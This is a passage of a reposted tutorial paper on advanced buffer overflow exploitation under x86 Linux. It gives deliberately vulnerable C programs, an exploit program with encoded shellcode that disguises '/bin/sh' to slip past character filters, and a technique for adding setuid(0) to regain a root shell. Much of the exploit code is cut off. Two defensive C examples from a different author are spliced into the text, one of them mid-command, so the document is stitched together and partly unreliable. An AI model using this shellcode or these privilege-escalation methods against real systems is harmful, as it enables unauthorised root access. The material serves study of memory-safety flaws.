Advanced Buffer Overflow Attack

Uploader: 子   Document ID: 42458772   Uploaded: 2018-06-02   Format: DOC   Pages: 32   Size: 162.50 KB

Source: unknown, 2004-9-2

Advanced buffer overflow exploit

Written by Taeho Oh ( ohhara@postech.edu )
-----------------------------------------------------------------------------
Taeho Oh ( ohhara@postech.edu )                  http://postech.edu/ohhara
PLUS ( Postech Laboratory for Unix Security )    http://postech.edu/plus
PosLUG ( Postech Linux User Group )              http://postech.edu/group/poslug
-----------------------------------------------------------------------------

1. Introduction

Nowadays there are many buffer overflow exploit codes. The early buffer overflow exploit codes only spawned a shell ( executed /bin/sh ). Nowadays, however, some buffer overflow exploit codes have very nice features, for example passing through filtering, opening a socket, breaking chroot, and so on. This paper will attempt to explain the advanced buffer overflow exploit skills under Intel x86 Linux.

2. What do you have to know before reading?

You have to know assembly language, C language, and Linux. Of course, you have to know what a buffer overflow is. You can get information on buffer overflows in Phrack 49-14 ( Smashing The Stack For Fun And Profit by Aleph1 ). It is a wonderful paper on buffer overflows and I highly recommend that you read it before reading this one.

3. Pass through filtering

There are many programs which have buffer overflow problems. Why

are not all buffer overflow problems exploited? Because even if a program has a buffer overflow condition, it can be hard to exploit. In many cases, the reason is that the program filters some characters or converts characters into other characters. If the program filters all non-printable characters, it is too hard to exploit. If the program filters only some characters, you can pass through the filter by making good buffer overflow exploit code. :)

3.1 The example vulnerable program

vulnerable1.c
-----------------------------------------------------------------------------
#include <stdio.h>
#include <string.h>

int main(int argc,char *argv[])
{
        char buffer[1024];
        int i;

        if(argc>1)
        {
                for(i=0;i<
[...]
-----------------------------------------------------------------------------

[...]
-----------------------------------------------------------------------------
#include <stdlib.h>

#define ALIGN                   0
#define OFFSET                  0
#define RET_POSITION            1024
#define RANGE                   20
#define NOP                     0x90

char shellcode[]=
        "\xeb\x38"                      /* jmp 0x38                  */
        "\x5e"                          /* popl %esi                 */
        "\x80\x46\x01\x50"              /* addb $0x50,0x1(%esi)      */
        "\x80\x46\x02\x50"              /* addb $0x50,0x2(%esi)      */
        "\x80\x46\x03\x50"              /* addb $0x50,0x3(%esi)      */
        "\x80\x46\x05\x50"              /* addb $0x50,0x5(%esi)      */
        "\x80\x46\x06\x50"              /* addb $0x50,0x6(%esi)      */
        "\x89\xf0"                      /* movl %esi,%eax            */
        "\x83\xc0\x08"                  /* addl $0x8,%eax            */
        "\x89\x46\x08"                  /* movl %eax,0x8(%esi)       */
        "\x31\xc0"                      /* xorl %eax,%eax            */
        "\x88\x46\x07"                  /* movb %eax,0x7(%esi)       */
        "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)       */
        "\xb0\x0b"                      /* movb $0xb,%al             */
        "\x89\xf3"                      /* movl %esi,%ebx            */
        "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx       */
        "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx       */
        "\xcd\x80"                      /* int $0x80                 */
        "\x31\xdb"                      /* xorl %ebx,%ebx            */
        "\x89\xd8"                      /* movl %ebx,%eax            */
        "\x40"                          /* inc %eax                  */
        "\xcd\x80"                      /* int $0x80                 */
        "\xe8\xc3\xff\xff\xff"          /* call -0x3d                */
        "\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh"         */
                                        /* /bin/sh is disguised      */

unsigned long get_sp(void)
{
        __asm__("movl %esp,%eax");
}

main(int argc,char *argv[])
{
        char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
        long addr;
        unsigned long sp;
        int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
        int i;

        if(argc>1)
                offset=atoi(argv[1]);

        sp=get_sp();
        addr=sp-offset;

        for(i=0;i<
[...]
                                    >>8;
                buff[i+ALIGN+2]=(addr
[...]
                buff[i+ALIGN+3]=(addr
[...]
        for(i=0;i<
[...]
-----------------------------------------------------------------------------

[...]
-----------------------------------------------------------------------------
#include <unistd.h>
#include <string.h>

int main(int argc,char *argv[])
{
        char buffer[1024];

        seteuid(getuid());
        if(argc>1)
                strcpy(buffer,argv[1]);
}
-----------------------------------------------------------------------------

This vulnerable program calls seteuid(getuid()) at start. Therefore, you may think that "strcpy(buffer,argv[1]);" is OK, because you can only get your own shell even if you succeed in the buffer overflow attack. However, if you insert code which calls setuid(0) in the shellcode, you can get a root shell. :)

4.2 Make setuid(0) code

setuidasm.c
-----------------------------------------------------------------------------
main()
{
        setuid(0);
}
-----------------------------------------------------------------------------

compile and disassemble
-----------------------------------------------------------------------------
ohhara@ohhara 1 $ gcc -o setuidasm
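Both vulnerable programs above copy argv[1] into a fixed 1024-byte buffer with strcpy(), and the first one rewrites characters before the copy. The point the section makes is that a character filter changes bytes but never the length of the input, so it is not a defence against the overflow; only a bound on the copy is. The C program below is an added example, not part of the paper and not the author's code. The exact filtering rule of vulnerable1.c is lost from this copy, so the filter here (replacing every non-printable byte with a space) is an assumption modelled on the description, and the 1100-byte input is constructed. It shows that the filtered input still does not fit a 1024-byte buffer, and gives a bounded copy that refuses such input instead of overflowing.

```c
#include <stdio.h>
#include <string.h>

/* Constructed filter, modelled on the paper's description of vulnerable1.c
 * (the real rule is missing from this copy): replace every byte outside
 * printable ASCII with a space.  It rewrites bytes but never shortens the
 * string, so it cannot prevent the overflow. */
void filter_nonprintable(char *s)
{
    for (; *s != '\0'; s++) {
        unsigned char c = (unsigned char)*s;
        if (c < 0x20 || c > 0x7e)
            *s = ' ';
    }
}

/* The check strcpy(buffer, input) never performs: 1 if the copy, including
 * the terminating NUL, would write past a buffer of bufsize bytes. */
int strcpy_would_overflow(size_t bufsize, const char *input)
{
    return strlen(input) + 1 > bufsize;
}

/* Hardened replacement for strcpy(buffer, argv[1]).  Copies only if a NUL
 * terminator lies within the first dstlen bytes of src; otherwise the
 * destination is left untouched and -1 is returned. */
int bounded_copy(char *dst, size_t dstlen, const char *src)
{
    size_t n;
    for (n = 0; n < dstlen; n++) {
        if (src[n] == '\0') {
            memcpy(dst, src, n + 1);   /* n bytes plus the terminator */
            return 0;
        }
    }
    return -1;                         /* no room: refuse instead of overflowing */
}

/* Constructed oversized input: 1100 bytes against a 1024-byte buffer, with a
 * few non-printable bytes (0x90 is the NOP value the exploit code pads with)
 * so the filter has something to rewrite. */
#define INPUT_LEN 1100
static void build_oversized_input(char *out)
{
    memset(out, 'A', INPUT_LEN);
    out[10] = (char)0x90;
    out[20] = 0x01;
    out[INPUT_LEN] = '\0';
}

/* 1 if the constructed input overflows a 1024-byte buffer both before and
 * after filtering, and the filter left its length unchanged. */
int filtering_does_not_prevent_overflow(void)
{
    char input[INPUT_LEN + 1];
    build_oversized_input(input);
    int before = strcpy_would_overflow(1024, input);
    filter_nonprintable(input);
    int after = strcpy_would_overflow(1024, input);
    return before && after && strlen(input) == INPUT_LEN;
}

/* Return value of bounded_copy() for the oversized input (-1: refused). */
int hardened_rejects_oversized(void)
{
    char buffer[1024];
    char input[INPUT_LEN + 1];
    build_oversized_input(input);
    return bounded_copy(buffer, sizeof buffer, input);
}

/* Return value of bounded_copy() for input that fits (0: copied). */
int hardened_accepts_fitting(void)
{
    char buffer[1024];
    return bounded_copy(buffer, sizeof buffer, "this fits comfortably");
}

int main(void)
{
    printf("filtered input still overflows: %d\n", filtering_does_not_prevent_overflow());
    printf("bounded_copy on 1100 bytes:     %d\n", hardened_rejects_oversized());
    printf("bounded_copy on short input:    %d\n", hardened_accepts_fitting());
    return 0;
}
```

bounded_copy() deliberately scans no further than dstlen bytes of the source, so it is safe even when the input itself is not terminated within reach; a fix that computes strlen(src) first would read the whole oversized input before deciding.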

-static setuidasm.c
ohhara@ohhara 2 $ gdb setuidasm
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
(gdb) disassemble setuid
Dump of assembler code for function _setuid:
0x804ca00 :     movl   %ebx,%edx
0x804ca02 :     movl   0x4(%esp,1),%ebx
0x804ca06 :     movl   $0x17,%eax
0x804ca0b :     int    $0x80
0x804ca0d :     movl   %edx,%ebx
0x804ca0f :     cmpl   $0xfffff001,%eax
0x804ca14 :     jae    0x804cc10
0x804ca1a :     ret
[...]
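The program in the previous section relies on seteuid(getuid()), and the paper observes that a later setuid(0) nevertheless succeeds. The reason is the third user ID the kernel keeps per process, the saved set-user-ID: seteuid() changes only the effective uid and leaves the saved uid at 0, and an unprivileged process may always setuid() to its saved uid. The C program below is an added example, not part of the paper, that models the Linux rules for setuid(2), seteuid(2) and setresuid(2) as documented in their man pages and replays both sequences: the paper's seteuid(getuid()) followed by setuid(0), and a hardened start that calls setresuid(uid,uid,uid) while still privileged, after which setuid(0) fails with EPERM. The model treats effective uid 0 as the privileged case and ignores capabilities; uid 1000 is a constructed sample value.

```c
#include <stdio.h>

/* The three user IDs the Linux kernel keeps for every process. */
typedef struct {
    unsigned real;   /* getuid()                                            */
    unsigned eff;    /* geteuid()                                           */
    unsigned saved;  /* saved set-user-ID, visible only through getresuid() */
} creds;

/* Model assumption: a process is privileged when its effective uid is 0
 * (stands in for CAP_SETUID; capabilities are not modelled). */
static int privileged(const creds *c) { return c->eff == 0; }

/* An unprivileged caller may only switch to an id it already holds. */
static int holds(const creds *c, unsigned u)
{
    return u == c->real || u == c->eff || u == c->saved;
}

/* seteuid(2): changes the effective uid only; real and saved stay as they are. */
int model_seteuid(creds *c, unsigned e)
{
    if (!privileged(c) && !holds(c, e))
        return -1;                       /* EPERM */
    c->eff = e;
    return 0;
}

/* setuid(2): privileged caller -> real, effective and saved all become u;
 * unprivileged caller -> effective only, and only if u is already held. */
int model_setuid(creds *c, unsigned u)
{
    if (privileged(c)) {
        c->real = c->eff = c->saved = u;
        return 0;
    }
    if (!holds(c, u))
        return -1;                       /* EPERM */
    c->eff = u;
    return 0;
}

/* setresuid(2): sets all three explicitly; an unprivileged caller may only
 * use ids it already holds. */
int model_setresuid(creds *c, unsigned r, unsigned e, unsigned s)
{
    if (!privileged(c) && !(holds(c, r) && holds(c, e) && holds(c, s)))
        return -1;                       /* EPERM */
    c->real = r;
    c->eff = e;
    c->saved = s;
    return 0;
}

/* The paper's sequence: a setuid-root program started by `user` calls
 * seteuid(getuid()) at start, then the injected code calls setuid(0).
 * Returns the effective uid afterwards: 0, because the saved uid stayed 0. */
unsigned euid_after_seteuid_then_setuid0(unsigned user)
{
    creds c = { user, 0, 0 };            /* setuid-root binary right after exec */
    model_seteuid(&c, c.real);           /* seteuid(getuid()) */
    model_setuid(&c, 0);                 /* setuid(0) from the shellcode */
    return c.eff;
}

/* Hardened start: setresuid(uid,uid,uid) while still privileged drops all
 * three ids.  Returns the effective uid after a subsequent setuid(0). */
unsigned euid_after_setresuid_then_setuid0(unsigned user)
{
    creds c = { user, 0, 0 };
    model_setresuid(&c, user, user, user);
    model_setuid(&c, 0);                 /* fails: 0 is no longer held */
    return c.eff;
}

/* Return code of that setuid(0) after the hardened drop (-1 expected). */
int setuid0_rc_after_setresuid(unsigned user)
{
    creds c = { user, 0, 0 };
    model_setresuid(&c, user, user, user);
    return model_setuid(&c, 0);
}

int main(void)
{
    printf("seteuid(getuid()) then setuid(0): euid=%u\n",
           euid_after_seteuid_then_setuid0(1000));
    printf("setresuid(u,u,u) then setuid(0):  euid=%u, setuid rc=%d\n",
           euid_after_setresuid_then_setuid0(1000),
           setuid0_rc_after_setresuid(1000));
    return 0;
}
```

On Linux a plain setuid(getuid()) issued while the effective uid is still 0 also clears all three ids, as model_setuid() shows; setresuid() states the intent explicitly, and a program that drops privileges can confirm the drop by checking that getresuid() reports no 0 in any of the three slots.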
